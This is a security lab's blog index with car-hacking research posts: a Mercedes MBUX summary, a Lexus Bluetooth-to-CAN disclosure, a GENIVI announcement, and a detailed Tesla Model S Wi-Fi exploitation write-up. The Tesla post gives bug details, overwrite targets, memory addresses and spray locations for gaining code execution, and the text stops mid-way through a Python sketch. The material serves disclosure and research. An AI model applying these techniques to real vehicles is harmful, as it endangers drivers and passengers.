Keen Security Lab Blog

Tencent Security Keen Lab: Experimental Security Assessment of Mercedes-Benz Cars

2021-05-12T06:00:00.000Z

MBUX (Mercedes-Benz User Experience) is the infotainment system in Mercedes-Benz cockpits. Mercedes-Benz first introduced MBUX in the new A-Class in 2018 and is adopting it across its entire vehicle line-up, including the Mercedes-Benz E-Class, GLE, GLS, EQC, etc.

In this research, we have conducted an in-depth and comprehensive analysis of both hardware and software of MBUX. We gathered technical materials and set up a test environment, analyzed the attack surfaces and performed security tests.

Modern infotainment systems are much more powerful, complex and secure than before, and MBUX from Mercedes-Benz is no exception. We have not seen any public material that gives a comprehensive security analysis of a modern infotainment system, so this research calls for a broad security assessment rather than a single penetration test. We explored the attack surfaces exhaustively, including components such as the radio.

In our research, we found various security issues in MBUX and successfully exploited some attack surfaces on the head unit and T-Box. We first gained physical access and subsequently remote access to the main infotainment ECU, the head unit. This enabled us to perform certain vehicle functions remotely (e.g. changing internal lighting colors or displaying images on the infotainment screen). We also demonstrated how to compromise an internal chip on the T-Box, which we proved by sending arbitrary CAN messages from a debug-version T-Box.

Following the global industry practice of “responsible disclosure” of product security vulnerabilities, we reported the technical details of all the vulnerabilities discovered in this research to Daimler. The discovered vulnerabilities were immediately confirmed by their security team.

Keen Lab appreciates Daimler’s prompt response and proactive attitude in handling our vulnerability report and in taking direct action to fix the issues efficiently. Both companies collaborated closely and highly efficiently.

Issued CVEs:

Disclosure Timeline

March 2020: Keen Lab kicked off the Mercedes-Benz research project internally.
November 2020: Keen Lab proved all the vulnerability findings and attack chains in an experimental environment.
21st December 2020: First Email from Keen Lab to Daimler
24th December 2020: Keen Lab reported all the research findings to Daimler security team in a secure way.
7th January 2021: First clarification Call between Keen Lab and Daimler
15th January 2021: Daimler security team confirmed all the vulnerabilities reported by Keen Lab. Some fixes for these vulnerabilities were already available and in rollout.
21st January 2021: CVEs requested by Daimler security team.
30th January 2021: Daimler security team confirmed and started the rollout for the new fixes.
February/March 2021: Preparation of the joint report publication.
May 2021: This summary report was released to the public.

Response from Daimler

Please refer to the following link for the press release from Daimler:
https://media.daimler.com/marsMediaSite/ko/en/49946866

The Daimler security team highly appreciates Keen Lab’s profound know-how, expertise and excellent work in the Mercedes-Benz research project. Daniel Eitler (CISO of Daimler) and Adi Ofek (the CarIT Security Mandate in Mercedes-Benz Cars) awarded Keen Lab a signed thank-you letter.

Technical Research Report

Please refer to the following link to learn more about our research:
Mercedes-Benz MBUX Security Research Report.pdf

Tencent Keen Security Lab: Experimental Security Assessment on Lexus Cars

2020-03-30T01:55:00.000Z

Since 2017, Lexus has equipped several models (including the Lexus NX, LS and ES series) with a new-generation infotainment system, also known as the AVN (Audio, Visual and Navigation) unit. Compared to some intelligent connected infotainment units, like the Tesla IVI and the BMW ConnectedDrive system, the new Lexus AVN unit seems a bit more traditional. From a security perspective, this may greatly reduce the likelihood of being attacked through cybersecurity issues. But a new system always introduces new security risks. After conducting ethical hacking research on a 2017 Lexus NX300, Keen Security Lab [1] discovered several security findings in the Bluetooth and vehicular diagnosis functions of the car, which could compromise the AVN unit, the internal CAN network and related ECUs. By chaining the findings, Keen Security Lab was able to wirelessly take control of the AVN unit without any user interaction, then inject malicious CAN messages from the AVN unit into the CAN network to cause a vulnerable car to perform unexpected physical actions.
Toyota is currently working on the mitigation plans. Therefore, we decided to make only a brief disclosure in this paper instead of a full disclosure, which would be irresponsible to vehicle users. If all goes well, the full technical report will be released at a proper time in 2021.

In-Vehicle Units Overview

Based on hardware analysis and CAN network testing on a 2017 Lexus NX300, we have a basic understanding of the in-vehicle architecture (AVN, DCM, ECUs and CAN network), which is shown in the following figure.

DCM

The DCM is a telematics box (a.k.a. T-Box) running on a Qualcomm MDM6600 baseband chip. Using the Ethernet-over-USB interface, it provides a 3G network to the AVN unit to support telematics services. It can query the status of ECUs (like Engine and Doors) through the CAN bus and upload the results to the backend.

AVN

As an in-vehicle infotainment unit, the AVN provides radio, multimedia and navigation functions to users. The Lexus AVN consists of two components: the DCU (Display Control Unit) and the MEU (Multimedia Extension Unit for maps). The DCU is the key component of the AVN unit. The main board of the DCU exposes some general attack surfaces, like the Wi-Fi, Bluetooth and USB interfaces. Through the uCOM board, the DCU can talk to the internal ECUs indirectly via CAN messages. The MEU is largely transparent to users and is only responsible for providing navigation data. A USB Ethernet cable between the DCU and the MEU carries their messaging.

DCU Main Board

After tearing down the DCU, we found that it contains two circuit boards. According to their positions, as shown in the following figure, the top layer is referred to as the DCU Main Board and the bottom layer as the DCU uCOM Board.

The DCU Main Board integrates some regular chips, including a Renesas R8A779x SoC [2], a Broadcom BCM4339 chip for Wi-Fi and Bluetooth, 2 x 512MB SDRAM, an 8GB eMMC NAND Flash and an 8MB SPI NOR Flash. The SoC has dual ARM Cortex-A15 cores that run various code, including the initial code (bootrom), U-Boot in NOR Flash, and the Linux system in eMMC Flash.
There’s a standalone SPI NOR Flash on the back side of the DCU Main Board. According to the chip’s datasheet, the SPI Flash has 64 Mbit of total storage. It’s trivial to solder wires to all the pins and connect them to a universal Flash programmer. After choosing the correct flash chip ID in “flashrom” [3], the whole Flash content can be dumped. By reverse engineering the dumped data, we deduced the basic memory layout of the Flash (as shown in Figure 3). In order to support A/B system updates, the Flash keeps a copy of some firmware images and config data, like the U-Boot Config, U-Boot Image and BSP Boot Config.

The DCU Main Board also integrates an 8GB eMMC NAND Flash to store the main code and data of the AVN unit, including the Linux kernel image, device tree blob, ramdisk image and Ext4 filesystems across multiple partitions. There is also a snapshot image of the Linux system that enables quick boot for the AVN unit. To support A/B (seamless) system updates, the eMMC Flash also keeps a copy of the Linux kernel image and ramdisk image. The memory layout of the eMMC Flash is as follows.

DCU uCOM Board

The purpose of the DCU uCOM Board is to manage power and external units, like the DVD player, air conditioner, touch pad and electric clock. To communicate with these external units, the uCOM Board is equipped with two CAN and LIN controller MCUs (SYSuCOM and CANuCOM), and each controller MCU is connected to a standalone CAN transceiver on the board.
The CANuCOM MCU is a CAN and LIN controller of the DCU. It is a Renesas R5F10PLJL chip (shown in Figure 5). Through its CAN transceiver, CANuCOM can access the Infotainment CAN directly and exchange CAN messages with in-vehicle ECUs, like the Gateway ECU and the Main Body ECU.

The SYSuCOM MCU is a CAN controller based on the Panasonic MNZLF79WXWUB chip. Through its CAN transceiver, it exchanges CAN messages with the touch pad and electric clock, which are in a dedicated CAN domain. It is connected directly to both CANuCOM and the DCU Main Board through UART ports, and relays messages between the DCU Main Board and the external units.

ECUs and CAN Network

The central gateway is an important ECU that separates the in-vehicle CAN network into different CAN domains, like Infotainment CAN, Body Electrical CAN, OBD Diagnostic CAN, Chassis CAN and Powertrain CAN. Another essential ECU is the Main Body ECU, also known as the Body Control Module (BCM). The Main Body ECU manages a set of ECUs that handle vehicle-body-related functions. The DCM and AVN belong to the Infotainment domain. For CAN-bus messaging, the DCU has by design two different CAN buses on the uCOM Board (referred to as CAN-1 and CAN-2). Through the uCOM board, the DCU Main Board can retrieve the vehicle status by sending specific CAN messages to the Gateway ECU.
CAN-1. The CAN bus of the CANuCOM MCU, which is connected directly to the Infotainment CAN. By communicating with SYSuCOM through UART, CANuCOM can indirectly forward CAN messages sent from the DCU Main Board.
CAN-2. The CAN bus of the SYSuCOM MCU, a dedicated CAN bus for communication among the DCU, touch pad and electric clock. This CAN bus is physically separated from the in-vehicle CAN network.
To send CAN messages, the DCU Main Board opens two standard UART ports (/dev/ttySC1 and /dev/ttySC9) to SYSuCOM. CAN messages that the DCU system writes to /dev/ttySC1 are transferred to the CAN-1 bus. Similarly, CAN messages written to /dev/ttySC9 are transmitted to the CAN-2 bus.

Security findings

All the following security findings have been proven to be effective on a 2017 Lexus NX300, and also have been confirmed by Toyota after we submitted the full report and collaborated with them on technical details.

Compromising DCU System Wirelessly

We used two vulnerabilities to exploit the in-vehicle Bluetooth service and obtained remote code execution in the DCU system (Linux OS) with root privileges. The first vulnerability is an out-of-bounds heap memory read and the second is a heap buffer overflow. Both vulnerabilities lie in the process of creating a Bluetooth connection before pairing, which makes the Bluetooth exploitation completely touch-less and interaction-less at close proximity. To obtain the Bluetooth MAC address of an affected car, the well-known “Ubertooth One” device [4] can be used to sniff the MAC address over the air if the DCU system has previously been paired with mobile phones.
Furthermore, the DCU system does not support secure boot, which means the whole system can be tampered with, for example by replacing the boot animation with a custom one. After taking full control of the DCU system, we found it was not easy to send arbitrary CAN messages, because a CAN message filtering mechanism is implemented on the DCU uCOM board. Luckily, the DCU Linux system is still responsible for reprogramming the uCOM firmware.

Reprogramming uCOM Firmware

By reverse engineering the uCOM firmware and its update logic, we were able to re-flash the uCOM board with a malicious firmware image to bypass CAN message validation and gain the ability to send arbitrary CAN messages to the Infotainment CAN.

Transmitting Unauthorized Diagnosis Messages

Based on experimental on-board diagnostics test results, we confirmed that a compromised DCU system is permitted to control diagnostic functions via unauthorized diagnostic CAN messages. For example, diagnostic messages can be abused to make the Main Body ECU cause the car to perform physical actions without authentication.

Wireless Attack Chain

By chaining the findings (listed in Table 1) in the Bluetooth and on-board diagnostic functions, a remote, touch-less attack chain from Bluetooth wireless connectivity down into the automotive CAN network can be implemented as follows.

Phase-1. The in-car Bluetooth service runs with root privileges in the DCU system. Once the DCU system is compromised through the Bluetooth vulnerabilities, malicious code is deployed wirelessly and remains permanently resident in the system.
Phase-2. The malicious code can be designed to make the compromised DCU system automatically connect to a Wi-Fi hotspot we created and remotely spawn an interactive root shell on the DCU system.
Phase-3. From the root shell, over the Wi-Fi network, we can then transmit arbitrary CAN messages through SYSuCOM and CANuCOM to the CAN bus.
Phase-4. Furthermore, by leveraging diagnostic CAN messages, some automotive ECUs inside the CAN network can be tricked into executing diagnostic functions, triggering unexpected physical motions of the car.

Disclosure Process

The security research on Lexus cars is an ethical hacking research project. Keen Lab follows the “Responsible Disclosure” practice, which is well recognized by global manufacturers in the software and internet industries, and works with Toyota on fixing the security findings and attack chains listed in this report.

Below is the detailed disclosure timeline:

Press Release from Toyota

Please refer to the following link.
https://global.toyota/en/newsroom/corporate/32120629.html

Reference

[1] https://keenlab.tencent.com/en/
[2] https://www.renesas.com/us/en/solutions/automotive/soc/r-car-m2.html
[3] https://www.flashrom.org/Flashrom
[4] https://greatscottgadgets.com/ubertoothone/
[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5551

Tencent Keen Security Lab joins GENIVI Alliance

2020-03-18T08:00:00.000Z

Tencent Keen Security Lab (Keen Lab) has joined the GENIVI Alliance, a non-profit alliance focused on delivering open source, in-vehicle infotainment (IVI) and connected vehicle software.

About GENIVI

The GENIVI Alliance[1] develops standard approaches for integrating operating systems and middleware present in the centralized and connected vehicle cockpit. The alliance links adopters of Android™ Automotive, AUTOSAR, Linux, and other in-vehicle software with solution suppliers resulting in a productive and collaborative community of 100+ members worldwide.

About Keen Lab

Keen Lab is a professional security research team under Tencent that has focused on cybersecurity for PCs and mobile devices for more than ten years. In recent years, Keen Lab has expanded its capabilities into new research areas, including connected/intelligent cars, IoT products, cloud computing and virtualization, as well as AI. A major research focus of Tencent Keen Security Lab is automotive security. Since 2015, Keen Lab has run research projects on connected vehicles[2,3,4] and built partnerships with manufacturers in the IoT and car industries. Keen Lab has accumulated a wealth of experience and technology in vehicle security penetration testing, security solutions, and best practices for connected cars.

Cooperation

As a new member of GENIVI, Keen Lab will contribute its comprehensive expertise and in-depth understanding of vehicle technologies to improve development processes and security guidelines, provide a shared benefit for GENIVI members, and enhance automotive security with its knowledge and solutions.

[1] https://www.genivi.org/about-genivi/
[2] https://keenlab.tencent.com/en/2016/09/19/Keen-Security-Lab-of-Tencent-Car-Hacking-Research-Remote-Attack-to-Tesla-Cars/
[3] https://keenlab.tencent.com/en/2017/07/27/New-Car-Hacking-Research-2017-Remote-Attack-Tesla-Motors-Again/
[4] https://keenlab.tencent.com/zh/2018/05/22/New-CarHacking-Research-by-KeenLab-Experimental-Security-Assessment-of-BMW-Cars/

Exploiting Wi-Fi Stack on Tesla Model S

2020-01-02T04:00:00.000Z

In the past two years, Keen Security Lab has done in-depth research on the security of Tesla cars and presented the results at Black Hat 2017 and Black Hat 2018. Our research involves many in-vehicle components. We demonstrated how to hack into these components, including the CID, IC, GATEWAY, and APE. The vulnerabilities we used exist in the kernel, browser, MCU firmware, UDS protocol, and OTA update services. It is worth noting that we recently did some interesting work on the Autopilot module: we analyzed the implementation details of the autowipers and lane recognition functions and gave an example of attacking them in the physical world.

To understand the security of Tesla's on-board system more comprehensively, we researched the Wi-Fi module (aka Parrot on Model S) and found two vulnerabilities in the Wi-Fi firmware and Wi-Fi driver. By combining these two vulnerabilities, the host Linux system can be compromised.

Introduction

This article details the two vulnerabilities and how to exploit them, demonstrating that an attacker can use them to hack into the Tesla Model S in-vehicle system remotely over Wi-Fi.

Parrot Module

The third-party Parrot module on the Tesla Model S is the FC6050W, which integrates Wi-Fi and Bluetooth functions. Parrot connects to the CID via USB and runs Linux. Parrot uses the USB Ethernet gadget so that it can communicate with the CID through Ethernet. When a Tesla Model S connects to a wireless network, it is Parrot that connects to it, and the network traffic from the CID is then routed through Parrot.

We can find the hardware organization from a very detailed datasheet[1].

The pinout of Parrot is also described in the datasheet. A Linux shell is available through the debug UART pins.

The reset pin is connected to a GPIO port of the CID, so the CID can reset the whole Parrot module with the following commands.

echo 1 > /sys/class/gpio/gpio171/value
sleep 1
echo 0 > /sys/class/gpio/gpio171/value

Marvell Wifi Chip

The Marvell 88W8688 is a low-cost, low-power highly-integrated IEEE 802.11a/g/b MAC/Baseband/RF WLAN and Bluetooth Baseband/RF system-on-chip (SoC) [2].

The block diagram is published on the Marvell website[3].

The 88w8688 contains an embedded high-performance Marvell Feroceon ARM9-compatible processor. By modifying the firmware, we read the value of the Main ID Register, which is 0x11101556. From this value, we concluded that the CPU might be a Feroceon 88FR101 rev 1. On Parrot, the Marvell 88w8688 chipset connects to the host system via the SDIO interface.

The memory region of 88w8688 could be as follows.

Firmware

The firmware download process of the 88w8688 has two stages: the helper firmware “sd8688_helper.bin” is downloaded to the chip first, then the main firmware “sd8688.bin”. The helper is responsible for downloading the firmware file and verifying every chunk of it. The firmware file consists of many chunks; the structure of each chunk is shown below.

struct fw_chunk {
  int chunk_type;
  int addr;
  unsigned int length;
  unsigned int crc32;
  unsigned char data[1];  /* chunk payload; the member name is missing in the original, "data" is assumed */
} __packed;
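
As a rough illustration of the chunk layout above, the following sketch unpacks one chunk header with Python's struct module. Little-endian byte order is an assumption (the text does not state it), the example chunk is synthetic, and the CRC is only read, not verified, because the text does not say which bytes it covers.

```python
import struct

# Header layout taken from the fw_chunk struct above: four 32-bit fields.
# Little-endian byte order is an assumption, not stated in the text.
FW_CHUNK_HEADER = struct.Struct("<iiII")

def parse_chunk_header(blob, offset=0):
    """Return (chunk_type, addr, length, crc32, payload_offset)."""
    chunk_type, addr, length, crc32 = FW_CHUNK_HEADER.unpack_from(blob, offset)
    return chunk_type, addr, length, crc32, offset + FW_CHUNK_HEADER.size

# Synthetic example chunk: every value here is made up for illustration.
example = FW_CHUNK_HEADER.pack(1, 0x1000, 4, 0xDEADBEEF) + b"\x01\x02\x03\x04"
header = parse_chunk_header(example)
```

Walking a whole firmware file would repeat this at payload_offset + length, assuming chunks are stored back to back.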

The 88w8688 chip runs ThreadX, an RTOS for embedded devices. The ThreadX code is located in the ROM region, so the firmware “sd8688.bin” runs as a ThreadX application.

On Tesla, the version ID of firmware “sd8688.bin” is “sd8688-B1, RF868X, FP44, 13.44.1.p49”. All the following research results are based on this version.

After identifying the ThreadX API, we obtained the following information about the tasks.

Also, the information about memory pools is as below.

Log and Debug

The firmware does not implement the CPU exception vector handlers for Data Abort, Prefetch Abort, Undefined Instruction, and SWI, which means the firmware halts after a crash and we cannot tell where or why it crashed.

So, we patched the firmware with our own Prefetch Abort and Data Abort vector handlers. The handlers record the register values, including the general-purpose registers, the status registers, and the link registers in system mode and IRQ mode. In this way, we know where the code was running in both system mode and IRQ mode when a crash happens.

We chose to write these values to unused memory, for example 0x52100~0x5FFFF. These values can still be read after the chip resets.

After implementing an Undefined Instruction vector handler and replacing some instructions with undefined instructions, we can get or set registers while the firmware is running. In this way, we can debug the firmware.

To download new firmware to the chip, send the command HostCmd_CMD_SOFT_RESET from the kernel to the chip; the chip then resets and the new firmware is downloaded.

Vulnerability in Firmware

The 88w8688 chip supports the 802.11e WMM (Wi-Fi Multimedia) protocol. In this protocol, a station can send an Add Traffic Stream (ADDTS) request action frame with a Traffic Specification (TSPEC) to another device. The other device then returns an ADDTS response action frame. Below is the action frame.

The whole ADDTS process looks like this. When the host operating system wants to send an ADDTS request, the kernel driver fills in a HostCmd_DS_COMMAND structure with the command HostCmd_CMD_WMM_ADDTS_REQ and sends it to the chip. The firmware then transmits the ADDTS request packet over the air. When the chip receives an ADDTS response from the other device, it copies this response, without the action header, into the HostCmd_CMD_WMM_ADDTS_REQ structure as the result of the ADDTS_REQ command and passes the HostCmd_DS_COMMAND structure to the kernel driver. After that, the kernel driver processes the response.

struct _HostCmd_DS_COMMAND
{
    u16 Command;
    u16 Size;
    u16 SeqNum;
    u16 Result;
    union
    {
        HostCmd_DS_GET_HW_SPEC hwspec;
        HostCmd_CMD_WMM_ADDTS_REQ addts_req; /* member name missing in the original; "addts_req" is assumed */
        // ...
    };
};

The vulnerability exists in the process of copying the data from the ADDTS response packet to the HostCmd_CMD_WMM_ADDTS_REQ structure. The copy length is calculated by subtracting the 4-byte length of the action header from the length of the action frame. But if the action frame contains only a header, and that header is only 3 bytes long, the unsigned subtraction wraps around and the copy length becomes 0xffffffff. As a result, memory is badly corrupted and the chip crashes very reliably.
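
The length calculation described above can be modelled in a few lines. This is a minimal sketch, not the firmware's code: it only reproduces 32-bit unsigned wrap-around, and checked_copy_length is a hypothetical guard added for contrast.

```python
MASK32 = 0xFFFFFFFF
ACTION_HEADER_LEN = 4  # header length the firmware subtracts, per the text

def copy_length(frame_len):
    """Model an unsigned 32-bit subtraction with no lower-bound check."""
    return (frame_len - ACTION_HEADER_LEN) & MASK32

def checked_copy_length(frame_len):
    """Hypothetical guard: reject frames shorter than the action header."""
    if frame_len < ACTION_HEADER_LEN:
        raise ValueError("action frame shorter than its header")
    return frame_len - ACTION_HEADER_LEN

normal = copy_length(10)    # ordinary frame: 6 bytes to copy
wrapped = copy_length(3)    # 3-byte frame: the length wraps around
```

With a 3-byte frame, the unchecked version yields 0xFFFFFFFF, which is the value the text reports being passed to the copy.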

Vulnerability in Driver

There are three kinds of data sent between the chip and the kernel driver through the SDIO interface: MV_TYPE_DATA, MV_TYPE_CMD, and MV_TYPE_EVENT. The definitions of the commands and events can be found in the source code.

Command processing works as follows. The driver handles a command from a user-space process, such as ck5050 or wpa_supplicant, and initializes a HostCmd_DS_COMMAND structure with the function wlan_prepare_cmd(). The last argument, pdata_buf, points to a related structure that contains the information needed to initialize HostCmd_DS_COMMAND. The function wlan_process_cmdresp() is responsible for handling the command response from the chip and copying the results back to the structure referenced by pdata_buf.

int
wlan_prepare_cmd(wlan_private * priv,
                 u16 cmd_no,
                 u16 cmd_action,
                 u16 wait_option, WLAN_OID cmd_oid, void *pdata_buf);

The vulnerability exists in the function wlan_process_cmdresp() when the driver processes the response to the command HostCmd_CMD_GET_MEM. The function does not check whether the Size member of the HostCmd_DS_COMMAND structure is valid, which results in a buffer overflow when the data is copied out of the HostCmd_DS_COMMAND structure.
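
To make the missing check concrete, here is a small model of a response header and the kind of bound a driver could enforce before copying. It is a sketch under assumptions: little-endian fields, a Size value that includes the 8-byte header, a placeholder command ID, and helper names (make_response, would_overflow) that are hypothetical and not part of the driver.

```python
import struct

# Command, Size, SeqNum, Result: four u16 fields, as in HostCmd_DS_COMMAND.
# Little-endian order and "Size includes the header" are assumptions.
HEADER = struct.Struct("<HHHH")

def make_response(command, size, body=b""):
    """Build a synthetic response; `size` is whatever the chip claims."""
    return HEADER.pack(command, size, 0, 0) + body

def claimed_body_len(resp):
    """Number of body bytes the response header claims to carry."""
    _command, size, _seq, _result = HEADER.unpack_from(resp)
    return max(size - HEADER.size, 0)

def would_overflow(resp, dest_capacity):
    """True if copying the claimed body would overrun the destination."""
    return claimed_body_len(resp) > dest_capacity

HYPOTHETICAL_CMD = 0x0000  # placeholder, not a real command ID
honest = make_response(HYPOTHETICAL_CMD, HEADER.size + 4)
oversized = make_response(HYPOTHETICAL_CMD, 0xFFFF)
```

Because Size is a u16, a response can claim a body of up to 0xFFFF minus the header length, far more than a small destination buffer can hold.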

Code Execution in the Wi-Fi Chip

The vulnerability in the firmware is a heap overflow. To use it to gain code execution in the Wi-Fi chip, we need to figure out how memcpy() corrupts the memory, what happens after the vulnerability is triggered, and where the crash occurs.

To trigger the vulnerability, the length of the action header must be less than 4, and we must provide the correct dialog token in the action frame, so that the length passed to memcpy() is 0xffffffff. The source address is fixed because the source buffer is allocated from the memory pool pool_start_id_rmlmebuf, which has only one block. The destination buffer is allocated from the memory pool pool_start_id_tx, so the destination address can be one of four addresses.

The source and destination addresses are located in the RAM region 0xC0000000~0xC003FFFF, but the whole address range from 0xC0000000 to 0xCFFFFFFF is valid. Reading or writing anywhere in this range gives the same result as accessing the RAM region itself.

Because the memory region from 0xC0000000 to 0xCFFFFFFF is readable and writable, the copy is very unlikely to ever reach the boundary of the region. After 0x40000 bytes have been copied, the whole memory can be considered shifted by one distance (the offset between source and destination). In this process, some data is overwritten and lost.
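
The shifting effect can be reproduced with a toy model. The sketch below assumes the valid address range simply mirrors the 0x40000-byte RAM (our reading of the paragraphs above) and uses a 64-byte stand-in memory with a source 5 bytes ahead of the destination; the sizes and the runaway_copy helper are illustrative only.

```python
RAM_BASE = 0xC0000000
RAM_SIZE = 0x40000  # 0xC0000000~0xC003FFFF, per the text

def alias(addr):
    """Map an address in the mirrored window onto the physical RAM range."""
    return RAM_BASE + (addr - RAM_BASE) % RAM_SIZE

def runaway_copy(mem, dst, src, count):
    """Forward byte-by-byte copy over a memory that wraps around."""
    n = len(mem)
    for i in range(count):
        mem[(dst + i) % n] = mem[(src + i) % n]

# Toy model: 64-byte "RAM", source 5 bytes ahead of the destination.
N, D = 64, 5
original = list(range(N))
mem = list(original)
runaway_copy(mem, dst=0, src=D, count=3 * N)  # three full passes

watched = mem[10]  # now holds what was originally at 10 + 3 * D
```

After three passes, position 10 holds the byte that started 15 positions further on, which is the "shifted by one distance per pass" behaviour. Positions close to the wrap-around point do not follow this simple rule, matching the remark that some data is overwritten and lost.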

The CPU in the 88w8688 has only one core, so the chip may not crash during the copy until an interrupt occurs. Since memory has already been corrupted by then, in most cases the chip crashes in an interrupt handler.

The interrupt controller provides a simple firmware interface to the interrupt system. When an interrupt occurs, the firmware reads the interrupt event from a register of the interrupt controller and invokes the corresponding interrupt handler.

There are many interrupt sources, so the chip can crash in many places after the vulnerability is triggered.

One possibility is that the interrupt comes from source 0x15, in which case the function at 0x26580 is called. There is a linked-list pointer at 0xC000CC08, and its value can be overwritten after the vulnerability is triggered. However, manipulating this linked list may not give us a chance to gain code execution.

Another crash happens in the handler of the timer interrupt. The handler sometimes performs a thread switch, and another task resumes running, which means the copy can be suspended temporarily and the chip crashes while another task is running. In this situation, the firmware usually crashes in the function at 0x4D75C.

This function reads a pointer at 0xC000D7DC, which points to a TX_SEMAPHORE structure. After triggering the vulnerability, we can overwrite the pointer so that it points to our fake TX_SEMAPHORE structure.

typedef struct TX_SEMAPHORE_STRUCT
{
    ULONG       tx_semaphore_id;
    CHAR_PTR    tx_semaphore_name;
    ULONG       tx_semaphore_count;
    struct TX_THREAD_STRUCT  *tx_semaphore_suspension_list;
    ULONG                    tx_semaphore_suspended_count;
    struct TX_SEMAPHORE_STRUCT *tx_semaphore_created_next;  
    struct TX_SEMAPHORE_STRUCT *tx_semaphore_created_previous;
} TX_SEMAPHORE;

If the member tx_semaphore_suspension_list also points to our fake TX_THREAD_STRUCT structure, then when the function _tx_semaphore_put() updates the links of the adjacent threads in the TX_THREAD_STRUCT structure, we get a chance to “write anything anywhere.”
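
The primitive mentioned above is the classic doubly-linked-list unlink. The sketch below is a generic model of that pattern, not ThreadX's actual code: memory is a plain dictionary, the two field offsets are hypothetical, and forge_thread is an illustrative helper.

```python
# Hypothetical offsets of the list links inside a fake thread control block.
OFF_SUSPENDED_NEXT = 0x00
OFF_SUSPENDED_PREV = 0x04

def unlink(mem, thread_addr):
    """Generic list unlink operating on attacker-controlled link fields."""
    nxt = mem[thread_addr + OFF_SUSPENDED_NEXT]
    prv = mem[thread_addr + OFF_SUSPENDED_PREV]
    mem[nxt + OFF_SUSPENDED_PREV] = prv  # next->previous = previous
    mem[prv + OFF_SUSPENDED_NEXT] = nxt  # previous->next = next (side effect)

def forge_thread(mem, thread_addr, target_addr, value):
    """Choose the links so that unlink() stores `value` at `target_addr`."""
    mem[thread_addr + OFF_SUSPENDED_NEXT] = target_addr - OFF_SUSPENDED_PREV
    mem[thread_addr + OFF_SUSPENDED_PREV] = value

mem = {}
forge_thread(mem, 0x1000, target_addr=0x2000, value=0x41414141)
unlink(mem, 0x1000)
```

Note the mirrored second write: the chosen value is also used as an address, so on real hardware it would have to point to writable memory.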

We can directly overwrite the instruction after “BL os_semaphore_put” with a jump instruction to achieve code execution, as the memory in ITCM is RWX. The difficulty is that we need to spray both the TX_SEMAPHORE structure and the TX_THREAD_STRUCT structure in memory. We also need to make sure the pointer tx_semaphore_suspension_list in the TX_SEMAPHORE structure points to our fake TX_THREAD_STRUCT structure. These conditions can be satisfied, but the success rate is very low.

We mainly focus on the third crash location, in the handler of MCU interrupts. The pointer g_interface_sdio, which points to a struct_interface structure, can be overwritten.

struct struct_interface
{
  int field_0;
  struct struct_interface *next;
  char *name_ptr;
  int sdio_idx;
  int fun_enable;
  int funE;
  int funF;
  int funD;
  int funA;
  int funB; // 0x24
  int funG;
  int field_2C;
};

The function pointer funB in this structure is invoked by this handler. If the pointer g_interface_sdio is overwritten, arbitrary code execution can be achieved.
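
The 0x24 offset annotated in the structure can be double-checked by mirroring the layout with ctypes. This sketch assumes every member, including the pointers, is 4 bytes wide on the 32-bit chip, so pointers are modelled as c_uint32; the class name is ours.

```python
import ctypes

class StructInterface(ctypes.Structure):
    # All members modelled as 32-bit values (assumption for a 32-bit ARM core).
    _fields_ = [
        ("field_0", ctypes.c_uint32),
        ("next", ctypes.c_uint32),
        ("name_ptr", ctypes.c_uint32),
        ("sdio_idx", ctypes.c_uint32),
        ("fun_enable", ctypes.c_uint32),
        ("funE", ctypes.c_uint32),
        ("funF", ctypes.c_uint32),
        ("funD", ctypes.c_uint32),
        ("funA", ctypes.c_uint32),
        ("funB", ctypes.c_uint32),
        ("funG", ctypes.c_uint32),
        ("field_2C", ctypes.c_uint32),
    ]

funb_offset = StructInterface.funB.offset
total_size = ctypes.sizeof(StructInterface)
```

Under that assumption funB sits at offset 0x24, so a forged g_interface_sdio value P makes the handler fetch its call target from P + 0x24.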

Here is the register dump when the instruction “BX R3” executes in the function interface_call_funB(). In this dump, g_interface_sdio has been overwritten with 0xabcd1211.

LOG_BP_M0_CPSR      : 0xa000009b
LOG_BP_M0_SP        : 0x5fec8
LOG_BP_M0_LR        : 0x3cd50
LOG_BP_M0_SPSP      : 0xa00000b2
LOG_BP_M1_CPSR      : 0xa0000092
LOG_BP_M1_SP        : 0x5536c
LOG_BP_M1_LR        : 0x4e3d5
LOG_BP_M1_SPSP      : 0xa0000013
LOG_BP_M2_CPSR      : 0
LOG_BP_M2_SP        : 0x58cb8
LOG_BP_M2_LR        : 0x40082e8
LOG_BP_M2_SPSP      : 0
LOG_BP_R1           : 0x1c
LOG_BP_R2           : 0
LOG_BP_R3           : 0xefdeadbe
LOG_BP_R4           : 0x40c0800
LOG_BP_R5           : 0
LOG_BP_R6           : 0x8000a500
LOG_BP_R7           : 0x8000a540
LOG_BP_R8           : 0x140
LOG_BP_R9           : 0x58cb0
LOG_BP_R10          : 0x40082e8
LOG_BP_FP           : 0
LOG_BP_IP           : 0x8c223fa3
LOG_BP_R0           : 0xabcd1211

The function interface_call_funB() is called by the handler of the MACMCU interrupt at 0x4E3D0.

After the source address of the copy reaches 0xC0040000, the whole memory can be considered shifted by one distance. After the source address reaches 0xC0080000, the whole memory has been shifted twice. The distance can be one of the following.

0xC0016478-0xC000DC9B=0x87DD
0xC0016478-0xC000E49B=0x7FDD
0xC0016478-0xC000EC9B=0x77DD
0xC0016478-0xC000F49B=0x6FDD

After the vulnerability is triggered, in most cases the memory has been shifted 3~5 times when an interrupt occurs. The pointer g_interface_sdio is at address 0xC000B818, so g_interface_sdio can be overwritten by the data at these addresses.

0xC000B818+0x87DD*1=0xC0013FF5
0xC000B818+0x87DD*2=0xC001C7D2
0xC000B818+0x87DD*3=0xC0024FAF
0xC000B818+0x87DD*4=0xC002D78C
…
0xC000B818+0x7FDD*1=0xC00137F5
0xC000B818+0x7FDD*2=0xC001B7D2
0xC000B818+0x7FDD*3=0xC00237AF
0xC000B818+0x7FDD*4=0xC002B78C
…
0xC000B818+0x77DD*1=0xC0012FF5
0xC000B818+0x77DD*2=0xC001A7D2
0xC000B818+0x77DD*3=0xC0021FAF
0xC000B818+0x77DD*4=0xC002978C
…
0xC000B818+0x6FDD*1=0xC00127F5
0xC000B818+0x6FDD*2=0xC00197D2
0xC000B818+0x6FDD*3=0xC00207AF
0xC000B818+0x6FDD*4=0xC002778C
…

The addresses 0xC0024FAF, 0xC00237AF and 0xC0021FAF are located in a huge DMA buffer, 0xC0021F90~0xC0025790, which temporarily stores the 802.11 data frames received by the Wi-Fi chip. This buffer can therefore be sprayed with fake pointers.
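
The arithmetic in the tables above can be reproduced with a short script. It uses only the addresses quoted in the text; the function names are ours, and treating the end of the DMA buffer as exclusive is an assumption.

```python
G_INTERFACE_SDIO = 0xC000B818
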